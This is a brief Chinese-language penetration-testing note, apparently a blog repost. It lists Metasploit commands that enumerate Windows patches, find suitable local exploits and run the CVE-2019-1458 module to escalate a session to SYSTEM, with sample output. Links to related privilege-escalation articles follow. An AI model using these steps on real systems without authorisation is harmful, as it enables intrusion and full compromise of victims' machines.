使用msf查詢補丁和可利用提權漏洞

本文轉載自查看原文 2021-06-25 12:41 202 提權輔助/ metasploit/ 滲透測試

# 查詢補丁

meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

# 查詢Exp

msf> use post/multi/recon/local_exploit_suggester
msf> set LHOST <攻擊機IP>
msf> set SESSION <session_id>
msf> run

# 利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 爛土豆提權——本質上是利用SMB中間人漏洞利用，偽造一個token實現提權 windows提權篇 msf提權-爛土豆提權-dll劫持提權-不帶引號服務路徑提權利用MSF批量打RMI漏洞 MSF利用永恆之藍漏洞 Kali之msf簡單的漏洞利用 Linux下利用SUID提權利用Metasploit進行Linux提權 MYSQL提權之反彈SHELL——數據庫提權屬於webshell到管理員的縱向提權，本質還是利用udf提權，無非是在mysql自定義函數中使用了反彈shell而已 [漏洞復現]CVE-2019-14287 sudo提權漏洞 [提權]Windows COM組件提權漏洞 (CVE-2017-0213)